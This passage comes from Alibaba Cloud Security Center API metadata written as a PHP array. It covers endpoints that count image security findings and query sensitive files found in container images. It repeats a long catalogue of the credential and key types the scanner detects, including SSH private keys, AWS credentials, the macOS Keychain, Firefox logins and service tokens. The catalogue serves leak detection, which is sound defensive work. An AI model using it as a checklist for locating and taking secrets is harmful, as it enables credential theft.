'The instance ID for image security scanning.', 'type' => 'array', 'items' => ['description' => 'The instance ID for image security scanning.', 'type' => 'string', 'required' => false, 'example' => '07a1300d-2198-4d0d-b1b3-c8da205e****', 'title' => ''], 'required' => false, 'maxItems' => 1000, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'C699E4E4-F2F4-58FC-A949-457FFE59****', 'title' => ''], 'Data' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'ImageBaselineCount' => ['description' => 'The number of image baseline risks in the current asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'ImageMaliciousFileCount' => ['description' => 'The number of malicious image samples on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'ImageScaVulCount' => ['description' => 'The number of image application vulnerabilities displayed on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'ImageCveVulCount' => ['description' => 'The number of image system vulnerabilities on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve image security event count', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageSecurityScanCount'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeImageSecurityScanCount', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"C699E4E4-F2F4-58FC-A949-457FFE59****\\",\\n \\"Data\\": {\\n \\"ImageBaselineCount\\": 0,\\n \\"ImageMaliciousFileCount\\": 0,\\n \\"ImageScaVulCount\\": 0,\\n \\"ImageCveVulCount\\": 0\\n }\\n}","type":"json"}]', ], 'DescribeImageSensitiveFileByKey' => [ 'summary' => 'Queries the sensitive files of an image.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '157987', 'abilityTreeNodes' => ['FEATUREsasF0IRDR'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'SensitiveFileKey', 'in' => 'query', 'schema' => ['description' => 'The sensitive file alerting type. Valid values:'."\n" ."\n" .'- **npm_token**: NPM access token'."\n" .'- **ftp_cfg**: FTP configuration'."\n" .'- **google\\_oauth_key**: Google OAuth Key'."\n" .'- **planetscale_passwd**: Planetscale password'."\n" .'- **github\\_ssh_key**: Github SSH key'."\n" .'- **msbuild\\_publish_profile**: MSBuild publish profile'."\n" .'- **fastly\\_cdn_token**: Fastly CDN token'."\n" .'- **ssh\\_private_key**: SSH private key'."\n" .'- **aws_cli**: AWS CLI credentials'."\n" .'- **cpanel_proftpd**: cPanel ProFTPd credentials'."\n" .'- **postgresql_passwd**: PostgreSQL password file'."\n" .'- **discord\\_client_cred**: Discord client credentials'."\n" .'- **rails_database**: Rails database configuration'."\n" .'- **aws\\_access_key**: AWS Access Key'."\n" .'- **esmtp_cfg**: ESMTP mail server configuration'."\n" .'- **docker\\_registry_cfg**: Docker image repository configuration'."\n" .'- **pem**: PEM'."\n" .'- **common_cred**: common credentials'."\n" .'- **sftp_cfg**: SFTP connection configuration'."\n" .'- **grafana_token**: Grafana token'."\n" .'- **slack_token**: Slack Token'."\n" .'- **ec\\_private_key**: EC private key'."\n" .'- **pypi_token**: PyPI upload token'."\n" .'- **finicity_token**: Finicity platform token'."\n" .'- **k8s\\_client_key**: Kubernetes client private key'."\n" .'- **git_cfg**: Git configuration'."\n" .'- **django_key**: Django key'."\n" .'- **jenkins_ssh**: Jenkins SSH configuration file'."\n" .'- **openssh\\_private_key**: OPENSSH private key'."\n" .'- **square_oauth**: Square OAuth credentials'."\n" .'- **typeform_token**: Typeform token'."\n" .'- **common\\_database_cfg**: common database connection configuration'."\n" .'- **wordpress\\_database_cfg**: WordPress database configuration'."\n" .'- **googlecloud\\_api_key**: Google Cloud API Key'."\n" .'- **vscode_sftp**: VSCode SFTP configuration'."\n" .'- **apache_htpasswd**: Apache htpasswd'."\n" .'- **planetscale_token**: Planetscale token'."\n" .'- **contentful\\_preview_token**: Contentful Preview token'."\n" .'- **php\\_database_cfg**: PHP application database password'."\n" .'- **atom\\_remote_sync**: Atom remote synchronization configuration'."\n" .'- **aws\\_session_token**: AWS session token'."\n" .'- **atom\\_sftp_cfg**: Atom SFTP configuration'."\n" .'- **asana\\_client\\_private_key**: Asana client private key'."\n" .'- **tencentcloud_ak**: third-party cloud SecretId'."\n" .'- **rsa\\_private_key**: RSA private key'."\n" .'- **github\\_personal_token**: Github Personal access token'."\n" .'- **pgp**: PGP encrypt file'."\n" .'- **stripe_skpk**: Stripe Secret Key'."\n" .'- **square_token**: Square access token'."\n" .'- **rails_carrierwave**: Rails Carrierwave file upload credentials'."\n" .'- **dbeaver\\_database_cfg**: DBeaver database configuration'."\n" .'- **robomongo_cred**: Robomongo credentials'."\n" .'- **github\\_oauth_token**: Github OAuth access token'."\n" .'- **pulumi_token**: Pulumi token'."\n" .'- **ventrilo_voip**: Ventrilo VoIP Server configuration'."\n" .'- **macos\\_keychain**: macOS Keychain'."\n" .'- **amazon\\_mws_token**: Amazon MWS Token'."\n" .'- **dynatrace_token**: Dynatrace token'."\n" .'- **java_keystore**: Java KeyStore'."\n" .'- **microsoft_sdf**: Microsoft SQL CE database'."\n" .'- **kubernetes\\_dashboard_cred**: Kubernetes Dashboard user credentials'."\n" .'- **atlassian_token**: Atlassian token'."\n" .'- **rdp**: Remote Desktop Protocol (RDP) connection'."\n" .'- **mailgun_key**: Mailgun Webhook Signing Key'."\n" .'- **mailchimp\\_api_key**: Mailchimp API Key'."\n" .'- **netrc_cfg**: .netrc configuration file'."\n" .'- **openvpn_cfg**: OpenVPN client configuration'."\n" .'- **github\\_refresh_token**: Github Refresh Token'."\n" .'- **salesforce**: Salesforce credentials'."\n" .'- **sendinblue**: Sendinblue token'."\n" .'- **pkcs\\_private_key**: PKCS#12 key'."\n" .'- **rubyonrails_passwd**: Ruby on Rails password file'."\n" .'- **filezilla_ftp**: FileZilla FTP configuration'."\n" .'- **databricks_token**: Databricks token'."\n" .'- **gitLab\\_personal_token**: GitLab Personal access token'."\n" .'- **rails\\_master_key**: Rails Master Key'."\n" .'- **sqlite**: SQLite3/SQLite database'."\n" .'- **firefox_logins**: Firefox logon configuration'."\n" .'- **mailgun\\_private_token**: Mailgun Private token'."\n" .'- **joomla_cfg**: Joomla configuration'."\n" .'- **hashicorp\\_terraform_token**: Hashicorp Terraform Token'."\n" .'- **jetbrains_ides**: Jetbrains IDEs configuration'."\n" .'- **heroku\\_api_key**: Heroku API key'."\n" .'- **messagebird_token**: MessageBird token'."\n" .'- **github\\_app_token**: Github App Token'."\n" .'- **hashicorp\\_vault_token**: Hashicorp Vault Token'."\n" .'- **pgp\\_private_key**: PGP private key'."\n" .'- **sshpasswd**: SSH password'."\n" .'- **huaweicloud_ak**: third-party cloud Secret Access Key'."\n" .'- **aws_s3cmd**: AWS S3cmd configuration'."\n" .'- **php_config**: PHP configuration'."\n" .'- **common\\_private_key**: common private key types'."\n" .'- **microsoft_mdf**: Microsoft SQL database'."\n" .'- **mediawiki_cfg**: MediaWiki configuration'."\n" .'- **jenkins_cred**: Jenkins credentials'."\n" .'- **rubygems_cred**: Rubygems credentials'."\n" .'- **clojars_token**: Clojars token'."\n" .'- **phoenix\\_web_passwd**: Phoenix Web credentials'."\n" .'- **puttygen\\_private_key**: PuTTYgen private key'."\n" .'- **google\\_oauth_token**: Google OAuth access token'."\n" .'- **rubyonrails_cfg**: Ruby On Rails database configuration'."\n" .'- **lob\\_api_key**: Lob API Key'."\n" .'- **pkcs_cred**: PKCS#12 certificate'."\n" .'- **otr\\_private_key**: OTR private key'."\n" .'- **contentful\\_delivery_token**: Contentful Delivery token'."\n" .'- **digital\\_ocean_tugboat**: Digital Ocean Tugboat configuration'."\n" .'- **dsa\\_private_key**: DSA private key'."\n" .'- **rails\\_app_token**: Rails App token'."\n" .'- **git_cred**: Git user credentials'."\n" .'- **newrelic\\_api_key**: New Relic User API Key'."\n" .'- **github_hub**: hub configuration that stores Github tokens'."\n" .'- **rubygem**: Rubygem token', 'type' => 'string', 'required' => false, 'example' => 'google_oauth_key', 'title' => ''], ], [ 'name' => 'ImageUuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the image.', 'type' => 'string', 'required' => false, 'example' => '0083a31ccf7c10367a6e783e8601****', 'title' => ''], ], [ 'name' => 'ScanRange', 'in' => 'query', 'style' => 'json', 'schema' => [ 'description' => 'The scan scope. Valid values:'."\n" ."\n" .'- **image**: Image.'."\n" .'- **container**: Container.', 'type' => 'array', 'items' => ['description' => 'The scan scope. Valid values:'."\n" ."\n" .'- **image**: Image.'."\n" .'- **container**: Container.', 'type' => 'string', 'required' => false, 'example' => 'image', 'title' => ''], 'required' => false, 'title' => '', 'example' => '', ], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content in the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese.'."\n" .'- **en**: English.', 'type' => 'string', 'default' => 'zh', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return. Default value: **1**.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page in paging query. Default value: **20**.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response for querying sensitive files of an image.', 'type' => 'object', 'properties' => [ 'SensitiveFileList' => [ 'description' => 'The list of sensitive files in the image.', 'type' => 'array', 'items' => [ 'description' => 'The sensitive file information.', 'type' => 'object', 'properties' => [ 'FilePath' => ['description' => 'The file path.', 'type' => 'string', 'example' => '/usr/lib/abc.txt', 'title' => ''], 'LayerDigest' => ['description' => 'The digest of the image layer.', 'type' => 'string', 'example' => '0083a31cc0083a31ccf7c10367a6e783e8601e290f7c10367a6e783e860****', 'title' => ''], 'Promt' => ['description' => 'The sensitive content.', 'type' => 'string', 'example' => 'AKPIDteow289f9s************', 'title' => ''], 'Advice' => ['description' => 'The suggestion.', 'type' => 'string', 'example' => 'Assess risks based on business conditions, remove risky content, and rebuild image', 'title' => ''], 'RiskLevel' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **high**: High.'."\n" .'- **medium**: Medium.'."\n" .'- **low**: Low.', 'type' => 'string', 'example' => 'low', 'title' => ''], 'SensitiveFileKey' => ['description' => 'The sensitive file alerting type. Valid values:'."\n" ."\n" .'- **npm_token**: NPM access token'."\n" .'- **ftp_cfg**: FTP configuration'."\n" .'- **google\\_oauth_key**: Google OAuth Key'."\n" .'- **planetscale_passwd**: Planetscale password'."\n" .'- **github\\_ssh_key**: Github SSH key'."\n" .'- **msbuild\\_publish_profile**: MSBuild publish profile'."\n" .'- **fastly\\_cdn_token**: Fastly CDN token'."\n" .'- **ssh\\_private_key**: SSH private key'."\n" .'- **aws_cli**: AWS CLI credentials'."\n" .'- **cpanel_proftpd**: cPanel ProFTPd credentials'."\n" .'- **postgresql_passwd**: PostgreSQL password file'."\n" .'- **discord\\_client_cred**: Discord client credentials'."\n" .'- **rails_database**: Rails database configuration'."\n" .'- **aws\\_access_key**: AWS Access Key'."\n" .'- **esmtp_cfg**: ESMTP mail server configuration'."\n" .'- **docker\\_registry_cfg**: Docker image repository configuration'."\n" .'- **pem**: PEM'."\n" .'- **common_cred**: common credentials'."\n" .'- **sftp_cfg**: SFTP connection configuration'."\n" .'- **grafana_token**: Grafana token'."\n" .'- **slack_token**: Slack Token'."\n" .'- **ec\\_private_key**: EC private key'."\n" .'- **pypi_token**: PyPI upload token'."\n" .'- **finicity_token**: Finicity platform token'."\n" .'- **k8s\\_client_key**: Kubernetes client private key'."\n" .'- **git_cfg**: Git configuration'."\n" .'- **django_key**: Django key'."\n" .'- **jenkins_ssh**: Jenkins SSH configuration file'."\n" .'- **openssh\\_private_key**: OPENSSH private key'."\n" .'- **square_oauth**: Square OAuth credentials'."\n" .'- **typeform_token**: Typeform token'."\n" .'- **common\\_database_cfg**: common database connection configuration'."\n" .'- **wordpress\\_database_cfg**: WordPress database configuration'."\n" .'- **googlecloud\\_api_key**: Google Cloud API Key'."\n" .'- **vscode_sftp**: VSCode SFTP configuration'."\n" .'- **apache_htpasswd**: Apache htpasswd'."\n" .'- **planetscale_token**: Planetscale token'."\n" .'- **contentful\\_preview_token**: Contentful Preview token'."\n" .'- **php\\_database_cfg**: PHP application database password'."\n" .'- **atom\\_remote_sync**: Atom remote synchronization configuration'."\n" .'- **aws\\_session_token**: AWS session token'."\n" .'- **atom\\_sftp_cfg**: Atom SFTP configuration'."\n" .'- **asana\\_client\\_private_key**: Asana client private key'."\n" .'- **tencentcloud_ak**: third-party cloud SecretId'."\n" .'- **rsa\\_private_key**: RSA private key'."\n" .'- **github\\_personal_token**: Github Personal access token'."\n" .'- **pgp**: PGP encrypt file'."\n" .'- **stripe_skpk**: Stripe Secret Key'."\n" .'- **square_token**: Square access token'."\n" .'- **rails_carrierwave**: Rails Carrierwave file upload credentials'."\n" .'- **dbeaver\\_database_cfg**: DBeaver database configuration'."\n" .'- **robomongo_cred**: Robomongo credentials'."\n" .'- **github\\_oauth_token**: Github OAuth access token'."\n" .'- **pulumi_token**: Pulumi token'."\n" .'- **ventrilo_voip**: Ventrilo VoIP Server configuration'."\n" .'- **macos\\_keychain**: macOS Keychain'."\n" .'- **amazon\\_mws_token**: Amazon MWS Token'."\n" .'- **dynatrace_token**: Dynatrace token'."\n" .'- **java_keystore**: Java KeyStore'."\n" .'- **microsoft_sdf**: Microsoft SQL CE database'."\n" .'- **kubernetes\\_dashboard_cred**: Kubernetes Dashboard user credentials'."\n" .'- **atlassian_token**: Atlassian token'."\n" .'- **rdp**: Remote Desktop Protocol (RDP) connection'."\n" .'- **mailgun_key**: Mailgun Webhook Signing Key'."\n" .'- **mailchimp\\_api_key**: Mailchimp API Key'."\n" .'- **netrc_cfg**: .netrc configuration file'."\n" .'- **openvpn_cfg**: OpenVPN client configuration'."\n" .'- **github\\_refresh_token**: Github Refresh Token'."\n" .'- **salesforce**: Salesforce credentials'."\n" .'- **sendinblue**: Sendinblue token'."\n" .'- **pkcs\\_private_key**: PKCS#12 key'."\n" .'- **rubyonrails_passwd**: Ruby on Rails password file'."\n" .'- **filezilla_ftp**: FileZilla FTP configuration'."\n" .'- **databricks_token**: Databricks token'."\n" .'- **gitLab\\_personal_token**: GitLab Personal access token'."\n" .'- **rails\\_master_key**: Rails Master Key'."\n" .'- **sqlite**: SQLite3/SQLite database'."\n" .'- **firefox_logins**: Firefox logon configuration'."\n" .'- **mailgun\\_private_token**: Mailgun Private token'."\n" .'- **joomla_cfg**: Joomla configuration'."\n" .'- **hashicorp\\_terraform_token**: Hashicorp Terraform Token'."\n" .'- **jetbrains_ides**: Jetbrains IDEs configuration'."\n" .'- **heroku\\_api_key**: Heroku API key'."\n" .'- **messagebird_token**: MessageBird token'."\n" .'- **github\\_app_token**: Github App Token'."\n" .'- **hashicorp\\_vault_token**: Hashicorp Vault Token'."\n" .'- **pgp\\_private_key**: PGP private key'."\n" .'- **sshpasswd**: SSH password'."\n" .'- **huaweicloud_ak**: third-party cloud Secret Access Key'."\n" .'- **aws_s3cmd**: AWS S3cmd configuration'."\n" .'- **php_config**: PHP configuration'."\n" .'- **common\\_private_key**: common private key types'."\n" .'- **microsoft_mdf**: Microsoft SQL database'."\n" .'- **mediawiki_cfg**: MediaWiki configuration'."\n" .'- **jenkins_cred**: Jenkins credentials'."\n" .'- **rubygems_cred**: Rubygems credentials'."\n" .'- **clojars_token**: Clojars token'."\n" .'- **phoenix\\_web_passwd**: Phoenix Web credentials'."\n" .'- **puttygen\\_private_key**: PuTTYgen private key'."\n" .'- **google\\_oauth_token**: Google OAuth access token'."\n" .'- **rubyonrails_cfg**: Ruby On Rails database configuration'."\n" .'- **lob\\_api_key**: Lob API Key'."\n" .'- **pkcs_cred**: PKCS#12 certificate'."\n" .'- **otr\\_private_key**: OTR private key'."\n" .'- **contentful\\_delivery_token**: Contentful Delivery token'."\n" .'- **digital\\_ocean_tugboat**: Digital Ocean Tugboat configuration'."\n" .'- **dsa\\_private_key**: DSA private key'."\n" .'- **rails\\_app_token**: Rails App token'."\n" .'- **git_cred**: Git user credentials'."\n" .'- **newrelic\\_api_key**: New Relic User API Key'."\n" .'- **github_hub**: hub configuration that stores Github tokens'."\n" .'- **rubygem**: Rubygem token', 'type' => 'string', 'example' => 'google_oauth_key', 'title' => ''], 'SensitiveFileName' => ['description' => 'The name of the sensitive file alerting type.', 'type' => 'string', 'example' => 'Google OAuth Key', 'title' => ''], 'FirstScanTime' => ['description' => 'The timestamp of the first scan. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1663321552000', 'title' => ''], 'LastScanTime' => ['description' => 'The timestamp of the most recent scan. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1663691592000', 'title' => ''], 'Description' => ['description' => 'The description of the sensitive file.', 'type' => 'string', 'example' => 'Verify the validity of the leaked AK.', 'title' => ''], 'Md5' => ['description' => 'The MD5 hash value of the sensitive file.', 'type' => 'string', 'example' => 'b484b0dff093f358897486b58266****', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information of the query result.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in the paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in the paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'LastRowKey' => ['description' => 'The key of the last entry.', 'type' => 'string', 'example' => 'CAESGgoSChAKDGNvbXBsZXRlVGltZRABCgQiAggAGAAiQAoJAGYXFWIAAAAACjMDLgAAADFTNzMyZDMwMzAzMDM1Mzc3Njc4MzA2ODY5NmI2YTY1Nzg2NTcxNjE2NDc4NjE=', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'The status of the query result. Valid values:'."\n" .'- **true**: Successful.'."\n" .'- **false**: Failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The service status code. A value of 200 indicates that the request was successful.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The detailed information about the error code.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'CE500770-42D3-442E-9DDD-156E0F9F3B45', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query sensitive files of an image', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageSensitiveFileByKey'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeImageSensitiveFileByKey', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"SensitiveFileList\\": [\\n {\\n \\"FilePath\\": \\"/usr/lib/abc.txt\\",\\n \\"LayerDigest\\": \\"0083a31cc0083a31ccf7c10367a6e783e8601e290f7c10367a6e783e860****\\",\\n \\"Promt\\": \\"AKPIDteow289f9s************\\",\\n \\"Advice\\": \\"Assess risks based on business conditions, remove risky content, and rebuild image\\",\\n \\"RiskLevel\\": \\"low\\",\\n \\"SensitiveFileKey\\": \\"google_oauth_key\\",\\n \\"SensitiveFileName\\": \\"Google OAuth Key\\",\\n \\"FirstScanTime\\": 1663321552000,\\n \\"LastScanTime\\": 1663691592000,\\n \\"Description\\": \\"Verify the validity of the leaked AK.\\",\\n \\"Md5\\": \\"b484b0dff093f358897486b58266****\\"\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 100,\\n \\"Count\\": 2,\\n \\"LastRowKey\\": \\"CAESGgoSChAKDGNvbXBsZXRlVGltZRABCgQiAggAGAAiQAoJAGYXFWIAAAAACjMDLgAAADFTNzMyZDMwMzAzMDM1Mzc3Njc4MzA2ODY5NmI2YTY1Nzg2NTcxNjE2NDc4NjE=\\"\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"CE500770-42D3-442E-9DDD-156E0F9F3B45\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'DescribeImageSensitiveFileList' => [ 'summary' => 'Queries sensitive file information.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '156729', 'abilityTreeNodes' => ['FEATUREsasF0IRDR'], ], 'parameters' => [ [ 'name' => 'Criteria', 'in' => 'query', 'schema' => ['description' => 'The value that corresponds to the search type.', 'type' => 'string', 'required' => false, 'example' => 'Rails Master Key', 'title' => ''], ], [ 'name' => 'CriteriaType', 'in' => 'query', 'schema' => ['description' => 'The search type for sensitive files. Valid values:'."\n" ."\n" .'- **SensitiveFileKey**: the sensitive file alerting categorization. Valid values:'."\n" ."\n" .' - **npm_token**: NPM access token'."\n" .' - **ftp_cfg**: FTP configuration'."\n" .' - **google\\_oauth_key**: Google OAuth Key'."\n" .' - **planetscale_passwd**: Planetscale password'."\n" .' - **github\\_ssh_key**: Github SSH key'."\n" .' - **msbuild\\_publish_profile**: MSBuild publish profile'."\n" .' - **fastly\\_cdn_token**: Fastly CDN token'."\n" .' - **ssh\\_private_key**: SSH private key'."\n" .' - **aws_cli**: AWS CLI credentials'."\n" .' - **cpanel_proftpd**: cPanel ProFTPd credentials'."\n" .' - **postgresql_passwd**: PostgreSQL password file'."\n" .' - **discord\\_client_cred**: Discord client credentials'."\n" .' - **rails_database**: Rails database configuration'."\n" .' - **aws\\_access_key**: AWS Access Key'."\n" .' - **esmtp_cfg**: ESMTP mail server configuration'."\n" .' - **docker\\_registry_cfg**: Docker image repository configuration'."\n" .' - **pem**: PEM'."\n" .' - **common_cred**: common credentials'."\n" .' - **sftp_cfg**: SFTP connection configuration'."\n" .' - **grafana_token**: Grafana token'."\n" .' - **slack_token**: Slack Token'."\n" .' - **ec\\_private_key**: EC private key'."\n" .' - **pypi_token**: PyPI upload token'."\n" .' - **finicity_token**: Finicity platform token'."\n" .' - **k8s\\_client_key**: Kubernetes client private key'."\n" .' - **git_cfg**: Git configuration'."\n" .' - **django_key**: Django key'."\n" .' - **jenkins_ssh**: Jenkins SSH configuration file'."\n" .' - **openssh\\_private_key**: OPENSSH private key'."\n" .' - **square_oauth**: Square OAuth credentials'."\n" .' - **typeform_token**: Typeform token'."\n" .' - **common\\_database_cfg**: common database connection configuration'."\n" .' - **wordpress\\_database_cfg**: WordPress database configuration'."\n" .' - **googlecloud\\_api_key**: Google Cloud API Key'."\n" .' - **vscode_sftp**: VSCode SFTP configuration'."\n" .' - **apache_htpasswd**: Apache htpasswd'."\n" .' - **planetscale_token**: Planetscale token'."\n" .' - **contentful\\_preview_token**: Contentful Preview token'."\n" .' - **php\\_database_cfg**: PHP application database password'."\n" .' - **atom\\_remote_sync**: Atom remote synchronization configuration'."\n" .' - **aws\\_session_token**: AWS session token'."\n" .' - **atom\\_sftp_cfg**: Atom SFTP configuration'."\n" .' - **asana\\_client\\_private_key**: Asana client private key'."\n" .' - **tencentcloud_ak**: third-party cloud SecretId'."\n" .' - **rsa\\_private_key**: RSA private key'."\n" .' - **github\\_personal_token**: Github Personal access token'."\n" .' - **pgp**: PGP encrypt file'."\n" .' - **stripe_skpk**: Stripe Secret Key'."\n" .' - **square_token**: Square access token'."\n" .' - **rails_carrierwave**: Rails Carrierwave file upload credentials'."\n" .' - **dbeaver\\_database_cfg**: DBeaver database configuration'."\n" .' - **robomongo_cred**: Robomongo credentials'."\n" .' - **github\\_oauth_token**: Github OAuth access token'."\n" .' - **pulumi_token**: Pulumi token'."\n" .' - **ventrilo_voip**: Ventrilo VoIP Server configuration'."\n" .' - **macos\\_keychain**: macOS Keychain'."\n" .' - **amazon\\_mws_token**: Amazon MWS Token'."\n" .' - **dynatrace_token**: Dynatrace token'."\n" .' - **java_keystore**: Java KeyStore'."\n" .' - **microsoft_sdf**: Microsoft SQL CE database'."\n" .' - **kubernetes\\_dashboard_cred**: Kubernetes Dashboard user credentials'."\n" .' - **atlassian_token**: Atlassian token'."\n" .' - **rdp**: Remote Desktop Protocol (RDP) connection'."\n" .' - **mailgun_key**: Mailgun Webhook Signing Key'."\n" .' - **mailchimp\\_api_key**: Mailchimp API Key'."\n" .' - **netrc_cfg**: .netrc configuration file'."\n" .' - **openvpn_cfg**: OpenVPN client configuration'."\n" .' - **github\\_refresh_token**: Github Refresh Token'."\n" .' - **salesforce**: Salesforce credentials'."\n" .' - **sendinblue**: Sendinblue token'."\n" .' - **pkcs\\_private_key**: PKCS#12 key'."\n" .' - **rubyonrails_passwd**: Ruby on Rails password file'."\n" .' - **filezilla_ftp**: FileZilla FTP configuration'."\n" .' - **databricks_token**: Databricks token'."\n" .' - **gitLab\\_personal_token**: GitLab Personal access token'."\n" .' - **rails\\_master_key**: Rails Master Key'."\n" .' - **sqlite**: SQLite3/SQLite database'."\n" .' - **firefox_logins**: Firefox logon configuration'."\n" .' - **mailgun\\_private_token**: Mailgun Private token'."\n" .' - **joomla_cfg**: Joomla configuration'."\n" .' - **hashicorp\\_terraform_token**: Hashicorp Terraform Token'."\n" .' - **jetbrains_ides**: Jetbrains IDEs configuration'."\n" .' - **heroku\\_api_key**: Heroku API key'."\n" .' - **messagebird_token**: MessageBird token'."\n" .' - **github\\_app_token**: Github App Token'."\n" .' - **hashicorp\\_vault_token**: Hashicorp Vault Token'."\n" .' - **pgp\\_private_key**: PGP private key'."\n" .' - **sshpasswd**: SSH password'."\n" .' - **huaweicloud_ak**: third-party cloud Secret Access Key'."\n" .' - **aws_s3cmd**: AWS S3cmd configuration'."\n" .' - **php_config**: PHP configuration'."\n" .' - **common\\_private_key**: common private key types'."\n" .' - **microsoft_mdf**: Microsoft SQL database'."\n" .' - **mediawiki_cfg**: MediaWiki configuration'."\n" .' - **jenkins_cred**: Jenkins credentials'."\n" .' - **rubygems_cred**: Rubygems credentials'."\n" .' - **clojars_token**: Clojars token'."\n" .' - **phoenix\\_web_passwd**: Phoenix Web credentials'."\n" .' - **puttygen\\_private_key**: PuTTYgen private key'."\n" .' - **google\\_oauth_token**: Google OAuth access token'."\n" .' - **rubyonrails_cfg**: Ruby On Rails database configuration'."\n" .' - **lob\\_api_key**: Lob API Key'."\n" .' - **pkcs_cred**: PKCS#12 certificate'."\n" .' - **otr\\_private_key**: OTR private key'."\n" .' - **contentful\\_delivery_token**: Contentful Delivery token'."\n" .' - **digital\\_ocean_tugboat**: Digital Ocean Tugboat configuration'."\n" .' - **dsa\\_private_key**: DSA private key'."\n" .' - **rails\\_app_token**: Rails App token'."\n" .' - **git_cred**: Git user credentials'."\n" .' - **newrelic\\_api_key**: New Relic User API Key'."\n" .' - **github_hub**: hub configuration that stores Github tokens'."\n" .' - **rubygem**: Rubygem token'."\n" .'- **SensitiveFileName**: the sensitive file alerting type.', 'type' => 'string', 'required' => false, 'example' => 'SensitiveFileKey', 'title' => ''], ], [ 'name' => 'RiskLevel', 'in' => 'query', 'schema' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **high**: high'."\n" ."\n" .'- **medium**: medium'."\n" ."\n" .'- **low**: low.', 'type' => 'string', 'required' => false, 'example' => 'low', 'title' => ''], ], [ 'name' => 'ScanRange', 'in' => 